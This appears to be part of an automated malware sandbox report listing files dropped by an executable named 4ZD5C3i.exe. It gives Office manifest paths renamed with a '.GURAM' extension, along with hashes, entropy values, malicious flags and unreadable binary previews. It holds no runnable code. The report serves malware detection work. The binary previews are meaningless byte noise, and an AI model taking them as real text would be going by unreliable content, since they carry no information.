                                                                                                                                                                                                                                                Preview:.]...B...:d...OX..;.f..b=...d...6.Imj....w?..g...E....U.022t.eo......3...O..Y7..M.2<.&....ev..U.47~'...6.a.......=...'wc.....^V.T+N<Y.,..........O......C{@a....;s.>hx...Z....I&>\u........y.....!.=.{W....U9.S...Sk..m..O...T........c%..,..E.2.R.d.z..nP...k..m;*.G.{b....+.f....#..Nx..1..Y..."l..qvOw2..K...O{..[?\.k....6.k..kL..d..r..f.~...U.i........R...<..V.:.E.Z...<D..A..6.]u.WzV..t.O..eE.3.85.....^.rk.N..`.p...J}:...<F/!Ni..u.........5.....Cc.H;....`i-y\...c...z9W.|.}.....0..........3...O!M..f..a.....s....m.a..N.t..?.....d.:Dgb.....N....,.D...6b...X.T.o.X.o.K..!.35 .....T3@.......F.t.......9.|;.G..6..[;J..v.:K.v.O..^.......".*.-5y..h......n.?,...b.R.4...c......5......<h..Q)3..Js7.G...i.E.0QS.2.....k..U..p..[./7...7h..6...s1.XT..q...0:..".....1..0.x.h..@..F...G)..eyd...}#...VD..MkT4.cg.N.W..q...........&2.8.*....]..Mv._.....M.........Kz127....!....`+DA..u..}7.><HH...K...{ve...sH.&l....^./..(..3I.;VG.r...TS.......&.....1..C

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-001F-0C0A-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2952
                                                                                                                                                                                                                                                Entropy (8bit):7.936635340721566
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:rEh33NzApzHt2ARp6f/EhG0TJlBuAdl7fnErSK9+I0bxegJcq4o0jZtw4L:rgnpApzHddGWlBDnErScQcHle4L
                                                                                                                                                                                                                                                MD5:19E634D2B749FA425FEAB3F383455563
                                                                                                                                                                                                                                                SHA1:A72C4C47B37711BF65930D0EEA68B5D7D8AA47E1
                                                                                                                                                                                                                                                SHA-256:D8422ADDDF455848AAF949971F3E3E2AED9A07BBDC7F4A18DD63FD4AC0971842
                                                                                                                                                                                                                                                SHA-512:88BCFEEA2F1E112F0B0A5A6B1E56839CB985814E284C916AC1D6BE0B3AA11848052F80FE8F7C1B5DEC720B38DEC7908187B6A96253F32C15179E23F7CD92F416
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..B...........&...s..VX0bj-b.W9.%G...h#pf.U...*.).}`7.....l..h....U.]..H.o.C.{...e......s.....Q.!..L....a...E...n.t?.#.X.!.7..,.N..H.-..c...r.9N!./..&.a..P.q..WI...c0 o..D....C.X..0G.......i.J.Pb.#.....(....s<..'u..;.f...W..}...)h.V.a.m`KW.cfz.2G.7.. 6.#C..1.]..m.....(......o..t2..).F...S.J.&..+.|.8.......Dis..N.B.{.m.O..!....rO....... {..1..\..C....]....r.`.T....|./..>A-...Ay...7..C(...Hj.7..n...Q.\ W..../1K..Ac.-.R.7.7.t.=...q..+4.7........zd.O.....:.O.._T....N@..o).l...3L..S[Y.M%&2'.B...[....x......O..Nf....n&..Q..`g..i.H.../....{..<...],..j....'.=.s...."...T{Sw@+&;m.......~y..7!...e.G.......qA..."....{g....F.6..N{..pQX..Iho8..r.....q..g..~|d...}a'..*_"<Lh.x.>9.!J..n.2...).......H..w.'VM....)d...L...9.Ek.._f...g.d....M..f.;...#...z...=p....uCC,..-z..VS.z.r.^.`.O.G.{..}..aa._..sP.._.&..v..I/....f.C..c......d5...$L..W...(]|8..K.Dz.;..D..g2.....M.q\w8.(:o*..r*S..)..Q|.....m..).F......1....*..`....r../o...w...Q....:Adt.%..y./..

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-002A-0000-1000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):25488
                                                                                                                                                                                                                                                Entropy (8bit):7.992530905426007
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:1Ako9vZxBfhud9XDtE/BB8udi+ei7eyonN2uPeT7gc5u5HIB8yj1WzxNTvOgV:1AkIZLKqk+neyngcg5HIdWzxNjOgV
                                                                                                                                                                                                                                                MD5:F12451722A7F0D821FF4B9CC9E335D05
                                                                                                                                                                                                                                                SHA1:28DAABBE6B17F4E5A7163A120676882EEA1D3AE0
                                                                                                                                                                                                                                                SHA-256:9FC119A86D347BD5DAC4B85C46ED88BF93E51704A875682914097F0F34B4C195
                                                                                                                                                                                                                                                SHA-512:D0F9B738BA4A6E258F3C4DFB5CEB5A96000A3293C12CE5DF1E82EB1AB885AE5104FA268626B381685BB02A807AE4B34521693F4B2B3A49675A02D4C9185674ED
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:g.Vk./.......J 6........S...c&]...$O......J<_....x.ip?...l...._.#....AF...u.?8.Q...k{>...W......N...M........L......'...........|.;~.N..e.....,.'.......k{:..x{.....t.......9H.).j. ..a..G....."^....*.b:...ht.)I$...e.p....hTbvZhEzL.....]H.s.0.....@..W,....^.'.\.v.g....X..;.#..;........Z..a,{.....\..z....H..#....G\...=.*..w..-.+...v..5......L..}..EI.H?.S.%Nu..&.X...d...bLz..$i.R#.!.hkx....C.|D.c....jD.&..o =..F.....+....J...D...[..F&9.....l~...;.O...n.N....l......./.5.O.8...xv=t..?.?..7hK..'...t.B. Ctw..B.ES.)...M.]...O.HK............K.[...%Kl..n?w....\..!F...'...........C....GK7...]'`....|.L ..).z.4.=>.?.ys*.T..........u..#.Y...<.P\.]........+.. .oZxg<#/.A.Yb.....gQi...dh_.Z.z...2y57...!..:........~..d.X..3 .....BV.?#..V..y?t.2;.,<.4.Js6...~......1h(v.....N....88......Jt.$.h....2.j.,.L}.*.....V..(..%......F...B...RL.Ib8.r.o..Q..P..Q...[|...(=8..p.........[CB>h..aP.E..jx..J|U.N..TJP.B...$B....E....XRj.'i.9.*....A.|b.......R`.V<.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-002A-0409-1000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2066
                                                                                                                                                                                                                                                Entropy (8bit):7.896106184294956
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:ajGaeYiS3RwjzjSk7iND90dkiu4cFEScDQrI4o0jZtw7dce:+LiKELGn4ucQtleZx
                                                                                                                                                                                                                                                MD5:99356EEC088DE8A3D4C9CB0E0D20DF27
                                                                                                                                                                                                                                                SHA1:D3F9F57C114020ADE855B4359551C2F1E220B40F
                                                                                                                                                                                                                                                SHA-256:2B0EC240A3450735901EF99ABA55F87577E728CA4B900E08FC80396CCDD96A88
                                                                                                                                                                                                                                                SHA-512:ED6DA256ECE54054C1E7787627452C82409360801E25037DF225D5C3A6E2BA82F0C7A05D31F5DAF30F3B68CCDDB01AAC5FBBC6A832E9E3CA842BD2B3067E5C5B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.._.`.[...6..\.2.t.h....)x.*.....E..Y.7.....I......k;..0....'.j?.s...;:..4].UfM.s.U.J55...||U.pm..9.#.c...J.mSWl.....7....j.[W.T.=_.9....3`.;M..j.{.m......2.-.33i..t...gh.*....xQ:%.3P\...K`..`...'6.W.Q.{j'9.....~...Nwt$n50.L...Lx......%R..k.'.J......!.6t...j.%..`.|~....FL...3..ScZ..Rq.Rt).....S.=..y..DXY....j....}.g!.._nF..@A...aKt6......S...+..k .[.. U.....:..}.*..l....[E'M.....ID.g.=Rs%G.q$G.....2.".7.......p.yV..:UG.5.vzi_*G*b....o}.Y.U.u...E.].[o....j .q8...|.NL.....S=G..M....=@r>.T`....9......H..J.Y....`.-h..{i.....rM11'..|........=~.j `.d.U)...>.&.......Z.Q.~..C..Fv.Q..|6.=...1..`e..Db..|....9.z...X.w=..@....IW.5k..V.".m.a..At..k.@.c...,......c.{.H.D.#f.oG.m.........R.|..7..^{...|...o.uP...R.H..Q."....G...[..y.A........"jE.....d.3.....).j..V(.m4.;..q.W]...|.c..kR(_.".O.`.w\._...'.a.=.)>...Ae..B..Rc..*6...Fv....d.A.oC....8X..81U.I.l.=Z.%.Ncw......yf..;.8!..!B. P.69Q.jx...A..l^._.\......B...p..0....%a......p..."K./5.t.........

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-006E-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7988
                                                                                                                                                                                                                                                Entropy (8bit):7.978803754455845
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:cwalFUqHCF7T7RTo4aaNQODAXMCPwG6XCwsOAoe6zeUE:cwalTHS7TG4a7ZXMFG6X3Aol1E
                                                                                                                                                                                                                                                MD5:7D2E3D68D272C24368DC4174FD844A5C
                                                                                                                                                                                                                                                SHA1:AB06D5FF9C99E134C5759FD4BD378B9DBB059C32
                                                                                                                                                                                                                                                SHA-256:BB6AF2DF726C38C4265EF571E0F69FE7DB9A080AF5368998A03B1BF32D6AF004
                                                                                                                                                                                                                                                SHA-512:1A7F5A595D73B236BE853BC04A193BCBE14B469A5AFCF9E7195DA001782896E508B7D5A0E9A4ABE5294F34DFC3E3B68B75A0870944175620632D83CCC14CD952
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.v.S..c...gM..9..v.[f_.h...n.?q.j...A}...+.xR4...K...0.x^..uie.."aa...B.OE........yy.r.....!.]..Y.4u\..1.8t<.@.'x.0........a..+R.1m.......j..bU!HF....Q........~`...g.M>q~uHg.....v.9..a.gL...h`9.q......V.X...2....4a<nfL......JI.r....^7.\.~.a..j.......].Bj2{j.".En.J./...=.l.0 _Q.f.-_8...#.B.7.U.t..HOu..=B{_..]...W}.'.F.u...GZ..0.!Q.xQ..&...;_R.......x...y...X\....s...P5....Pq..w.sB.B@.......+.S...@..._....../..V.e..I.`Yd}.g...!."l\...>...E..g.~g...^.S..B.(..Q..gY._1........iX..)...^...f.h.U-6....~...T..os...m.G.....'..OMN.D..z>%n.-A..l..D..TK......^...}........]...'.`|U.......#. .u.s..r.........Vp1....E...j.....I(.P.....C..$..QH...1....L.j"@1...^..X....mL./.. ..Q.!....m..m.S..'I\0.2..*..x...R.6.7P...A...m.mW..RF....4i.U..).N...X....lR.....=.[~........U....u.Nl+...vA.....%...n.\..p.!....uy.AL`u..B.jlx./....._.F..dd.<..P....OLn..7.r-.H.e,..U.#(3]uI...[.m<......Y.k..k.....T.....2.c?.c...[..W...t.4.....\..R.4..$..Xl...c2...(.....rc..$.Ph..].P....\Bc.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0090-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):367968
                                                                                                                                                                                                                                                Entropy (8bit):7.999430154750203
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:sTQ/tfYSGtzYGXVcZdka8r5aZMC446bq7KgKmWtDn2y9sIxUc11jKj9/xPCybGM:eQBYSG9tVcZdka8hC3VKgKmWtT2zIxUh
                                                                                                                                                                                                                                                MD5:44A8215FCC10636D428786855FEDCD70
                                                                                                                                                                                                                                                SHA1:3AB5F7A410704BFDDD2C43844DDBD408A2ECC37A
                                                                                                                                                                                                                                                SHA-256:3CC33E735F6E3B9EF55F3221790DCA920DCC8DEC142722FF6424BBA8891EC8E6
                                                                                                                                                                                                                                                SHA-512:57A76916C98E6342B3F7860721138EE0F68D58B3E2ECD5BC23A99A6433266A4B2630E7EF8C5EF0602F258B4189E6480D0FFF313EB2125C7F11E3395C8924845D
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:,V.q..JR..u=P.C...{.2..Z.}.>]...z..R@.....z...._...%......a.B..)...........+.Q..T).......'..Q.p....$..A{...<Y`...Ne...kT)...5.|.~:L..%'>...p..aZ.f..L,...G..V...!.w.U..ua...|).......?F(......._q.|.2..GYG..}'...v.?#........Kd...,..ut.W.Z....#.{.cb...6Q...^:x?...?(... .44..=!5....-..$.X(v...,D.{.&...3b).i.5.&./fx...Y1.-.....9.O. ./}i;Ov&.......vN!.O.+..i.4.M.b.c..z......].Mo;m."....V;1".[z....,L..).....i.J...^.Q+...L^.(..~...mc.s.{....<..$.(}.E.....5... ,.m.....`t..I=..i......]...G._]...>...#/..H..0.B..'F.8.... `15a......L.'..4...n.^....-?.$ ......7,....w..y...(.p8.=......N.m..H.&J.. .J..._L..K......^g.Q".........+.lh~7xn|"!....f.^[.'.:..f.,P..8u^.h.Z..l_L.n....1.'Kz...8.@.C:..y.....>d..-:....aO.....S.[."._.[.a.)s.<2..`..<...F....1...8...;DS.P....D...3I..WOdX8.............Ah.|]/......<C..'._..m....N.^......>..E..wx.p.<jJ^.`P9~.u...{L..$.Fu9..at.n....Z?.J......=..:...W.....vt.S....-...\...s.....k.D.Z..[..~.....$g].).+........q.....I.if

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0090-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1996
                                                                                                                                                                                                                                                Entropy (8bit):7.893404022549017
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:8nLORO7KthTNbKsFy9tGT2jrQLlN7m0GUNwO6IgcQk+tjmJrc0YXUZtwsTYsa:8qPthV58czo8U4o0jZtwJsa
                                                                                                                                                                                                                                                MD5:213F048E4A75301F405876001647A998
                                                                                                                                                                                                                                                SHA1:2E8669617A8C759DA2A94D78841CB29F347C9D42
                                                                                                                                                                                                                                                SHA-256:51CBC3F6239430A42A75898DFE9EB0F8F67BF6964C7E83A6A5AEF8527C645C5B
                                                                                                                                                                                                                                                SHA-512:FA827830E049EB274F1EA0E7FF2029DDAA96F9257270B22419903035BEDF9D75C1C7C09C203C6348FC2306576FC76AE5EDA3BC6F35B872EEDB0552F4B5282E1D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..F.xS.z.9..F3...m'n"..6...5..{.}1I..]7...T~.@.&...s.....`J..$FD....Fy...}..r....^.l.K.F....*.[ '.wk...PQ4qo...A. .%.jaS.V.y.s.=...jb...1..8U...k..Q.j.......U..k...D]...};.".UG}..a...&.....m.C...Z..J......l.`.....g.i.s9.D/....&.J.._....9X.4......E......,./C?o....._A....ft...<..qd......Bb..Eya.(..>..Q..1n..E.....)..#7l5.z...s8:h&...d.0..)..d..O.y..P0.HY...+...F~.{...;L.....q.Rk...O.i..dO..\...2....X...KK.V.G .N?!:.a...4...7.$_.I.S}.....E....~/;kW...i7....p......i...^z94\.^.R.j!!a<Y...;W{f).%:*..e...ul......f:7.....+.s.(Y4d).S...E....b+.s...%..C..Vi..iYy....[.r...G./.ak. ...j=...-..f3.....-.3..&b.$.......C..f.}..."....j.Q...G.D.....`..H..>...M..Ms8*.._.<U...c"...M.XU..%..%..3.#..7.;.b=.. Q. .8......s..%...g..p.V.....:...._5.%....Av...X...=....3.n.T_J*ebwf0.V.9.d.f.y.T6m5.....9.....,L.2[)...VW....b.66..Y......X...D...Z.|)<.t.hd.\.$..:d.lj.o.M.f.'......Qa.3....{.)..-....2.F..nt\.......$..u.RHu.X$9B..C.x..wm...U^z.p4.=.m.*....Fg...m....g0..$.`..FWk.@.B..*

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-00A1-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):61041
                                                                                                                                                                                                                                                Entropy (8bit):7.99685022803448
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:/s7+mwgcTUNKeqvyvK4t3a37edcDkOehegt5Oa+ykUu:m+mwbUB0z48rxDkORgjnru
                                                                                                                                                                                                                                                MD5:3672DD827169F70287057B489D16819F
                                                                                                                                                                                                                                                SHA1:A2A80C3398814EE0AC75D86A8F5D5728F2608B9C
                                                                                                                                                                                                                                                SHA-256:5DAC29A3483709D916A74DEF86627A86F232CE8EFCF616A03AB82A9A7C534B48
                                                                                                                                                                                                                                                SHA-512:CB9A053663AC94F29261964683F36D057FE1915BF793F250C1833F7E6B3C8E4E05A27C342AD58194B21C260639CB9CEA5BBA31CFAD544A55155B8A57900471B2
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..\......IbL.C1.S.....y....._T..1G...K...HR..X..Y..,....W%>.....K.v...........r>0..@..zp.4..~C..Xp..........#..&kK.<.CC(\..U.....B.E6..|..o....c.u...M..t;NH...f......}0?s..z.1..~N7A`6..+...O..DJ..?.0KX.^g...w..3...[.&E.>o?5x.B^...R?L<K9g:..n..v1g..q....H<...U.u..S..,....Hk(...W_.jm.,hI...`.".`9/..&.L.. ..At....5...{.qv..l...q,F.j..R5c."N...y.(.n>.-...W..l/.. .=R.J..W2.$..`....f.!...(vR..|..8N{l....<3.}N.n.#:.#Y...JY..../..V......^...Q....e^.......>....w."z..j. (.^..p#..`D....r@.....<..:...-.fp3.M...NZlL..j.?...+%..MxZ...Z.Ex?.}|..p..m.v|...+.x.X....z.{L.|...2..@...C}.."...........)...$).lF..C..............V.\:w....RP^..E.y.}Gj>Tq.TDl.....bZ.U.....+...<M.D.79..k .V.8.ix|.J)Y.............>I....r..W....f..Z..OlY.....l...V........q....z.....\.L..B.Q.C....~4m..A<&..0w#....9S4.x.em-..Og..e=....lE...._..#....6..l.H/.I.y.......{|\.e..F.l.Z4B.-@...+=.^w.."..z.....o...|.9...(...B."T.NEqj..J./......r+i...... .?M.W..%....ea.].JO.y.!=`-..qo.2.+..m.p>.<

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-00A1-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1996
                                                                                                                                                                                                                                                Entropy (8bit):7.89962631167003
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:EnEYUbBYR7jqyHE6XmIsgZzV4F5Q4o0jZtwx:EnEblYR/9HEYmIFZRWhlex
                                                                                                                                                                                                                                                MD5:FB64A47FCCD1DA648C0503A8A6E7B4D7
                                                                                                                                                                                                                                                SHA1:5F2A9EF741EA621338AACBE0930D95EED30B2587
                                                                                                                                                                                                                                                SHA-256:7FC7A0930BE1055BA25E5B661EC6BE4B3CCA10270F238E25C2285ECE1846BB49
                                                                                                                                                                                                                                                SHA-512:E75C0195EB9BCE7803549A6FCDC5CBCBF639A5D4BB6DBCA9AC703AFC86AAC7ED14665252FB4C368920B900165BDFF2B006FAE849A85367AF27C9C72EF153E749
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....m..B...."J]....P..pbI...~W....:n..pv...&&.9A.G...()a..|...Y,8&..tB.Y.....7.k....Q.......C...+...i....zY@..N.P...u.n.,....1zr.%.ys.m.-Vgwq..ISt`sP..U.d...2..R..t..A..^/=k.u)~r'..3......x.B.K%.+.g.~.2d#p.4c.m../..t.c..A)N.............c.*]......9..,......oQ... o./o.C.m..my..SA........+..w*.^..6T..*..z....bD\.." .@...&S......q7's.w...n..H+..z.9..=..<.O....L.......Z..n.w~.....O.............B8.....9........\......u2..2(..?z.g/.`.....:dF..........i... .....a......`..f...W...*.].......=:....8.}..9.....cZ.......^...f...e..GE.....v..x./.r.5.\...W..G.95.....D..F."..h.........+x.>'....R....u%..+LTn....'.c........k..i..*.........Dm..W!.Y..F.'.a..C..).+P.~X;...z_..i(t.M.w..8....2.......<.9(*F.h.....#..H..V..PyF`....%.6...OQ..Q.G.....v.fA....U"=....|.Q..'.X...O....!..!0.. .._s....t.<..Yv}W.A.Y?X*e..I..R...n.P.3..@....4z.Z..T.)....B7.......+.....z.......P91..u.2.F........_n8x. ...a..X..N.3.m.8..3n...][..+K........)....u.._.k...Cl.Q...e.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-00E1-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2185
                                                                                                                                                                                                                                                Entropy (8bit):7.908642713354097
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:I7gRs6OJiRD652OFKJcvyc1TIfj4o0jZtwB:EgRd8iRD6526UcvnMAleB
                                                                                                                                                                                                                                                MD5:D1709945025128AD950DBA26FA6DAC18
                                                                                                                                                                                                                                                SHA1:E2EC6E79CF890754804063E10A267831C7C6E836
                                                                                                                                                                                                                                                SHA-256:8B464899BF03AEF429DA1546A19DFF8DCE53B7F875C8F72A002FC1FEB3F639EB
                                                                                                                                                                                                                                                SHA-512:C409740FA7E97E85C40C396B99426C37CC7AE93FCB12E480724774B62B2A77CE586010314AF8524998B9F6D17FD43CA20547A5F8E8A2FB3F64C02FD04750B81C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..=.3...vsa..>W.'". .A..my...".[c[5qv}..C....(.+J...{.....(.F.<.>..f...0.lJ.[f..0.`8...y...0........y.rA.-.J.........u.{C.i*.. .zLJ.!.\.Bq.Z.3...8~T.......>^....o..E{b.B.1.....W.c..<.9....!...g)........J../..~..s6..pCT..l.....*..|...'UF.;.....*O.R,....D`............9FO...w...X.J.^.KYUM...8..-$~....nA8.R...R"..ef./.65. .......3.....NY...(..5Nq.D...ry...|..W1z6.N...6B..v.I.............fC8.I+6..>.CE..`".Y..4....p.2..#.Q......li.`.fcb...]..O4..T6[.h...+.l..[Q.{."b.]C/.R...5.%H)9.rH.}....>.C).m..$?.... ..mm;.h.P..7.}..|Z}...0...C...@.O.....Z....@."..@NT".w..J.f).h.f....A1..58.L Ig...]$.....n..O>y#.!'..$.+...+.....];..p"E.D.}...*...c...|.:.q........4...MK...<...0;>..Z{..W).....Xe~'.An..j.....Uj...f...x4....__...fR...|e0y.]..N;..\....t.[Z...:...P.B.I......s.r5...B...K.z...g.u.M.J..l...;.N..K...]ip.z<.....(.2.%.bGc..D!f...;..)..+.'.%...}.B..f..&.."..f#v...........F.....1(g.9..'n/..O.K.<3.r...P..C.....-...F..W.m..U4o.q(..E....m.....K.&...3.u.fN.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-00E1-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1900
                                                                                                                                                                                                                                                Entropy (8bit):7.894793348675552
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:hW2sLCAgciiBk3cuxdnyUMkb4o0jZtwiPv:hW2sbiiQfklkglem
                                                                                                                                                                                                                                                MD5:EB54316F32A80E7EC3EA6A7F83A80457
                                                                                                                                                                                                                                                SHA1:CC6AE390C0B997F4A04DC268482667153244EF91
                                                                                                                                                                                                                                                SHA-256:EC9876C670E8A75CF5F47DCDBD3870BFA81BD3087E0F94A6BAAA3DD9755E2BFE
                                                                                                                                                                                                                                                SHA-512:7D50160BDFA5244D72AB8D12BC3182A3E7D9E516B2EF347513219282278EBE13968B366BF6099DEF1C51B86E5AF7162AECFD3AEF7DE1F547B7D7BC40ABE942BC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:#L.@.W.>..4_uv....O...D.. .}J^......?$rQ.s...e..........aso.L..9JW..:L..0..............=<.........E?.....m..Ks..E!V.BJ..`..4../....z..o.".L.j..5A8xBqb....X...A..-..B..v...7....)..h.0AD.K....8!r0B.@S..fEK.....<...<)(...$....n..a.l.J.p}.b7.Ri.m...u......ge...U.~./.`G;..'4....s ..F.i....Y.z..X.s..d.h(.FE.2......'9b...\c....h....Qp.....z...|..35.f8c..2H..|.7..O....!.>!9.!.:....$T.Q8....e{..,.....&..G.6......?i.......:.0k....g.<S.g.S..GX..............N.h.....K;..`F....n.?..K.Li-.3FD~..[.D..^ru........X..h..Q..._.-.\......._;./.0/.>....T.%%.....'`...1.{......ed.A....M.../.3..0I.'.=.T....X..n...H............S.+.v.O\x.}3G.O.C.....;8..^.\....T.Q.v...........(.....i.a.v......M..j..K.0."q.(..@....( ...ay.8..T...N.3l........ ....#..F..J....AZ?..|...}\.7U.En0i.....(.n..t%C;. .k1u`_af.3....=......w2........6..8.Q.......z... ...." FTg.....U...!..'..cT.B$.ig`....o. ^.......%4ed..;.f..[.....V.d.j.LU..."E..XJ~.g.....8W.."...u7.6.._.*...!].

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-00E2-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3620
                                                                                                                                                                                                                                                Entropy (8bit):7.945608189510525
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:rPSsvTUkIw3RGh7r+OYpnj1BnpLy9hJ+r8rKleO:rPSsvRIUG4OgnpLyDJ+r8uUO
                                                                                                                                                                                                                                                MD5:AB715245D748528E06019603F5BBEBFA
                                                                                                                                                                                                                                                SHA1:C884C5607DA7453DB21D685C461EDEBEB5C72CE5
                                                                                                                                                                                                                                                SHA-256:CDFA2A92EBC85CAC34BB307D99787384ABD56096FCDC28ED241AC2C2296122B7
                                                                                                                                                                                                                                                SHA-512:885AC9BF8D3EF29BD2689711C1ABEF8B0AA2987114E6C5D63E3DB287EF2917626784F4BDA40FEF5B52C6C122E53940FE85AB02FF9DB2BD77BA46B9CE93109F30
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
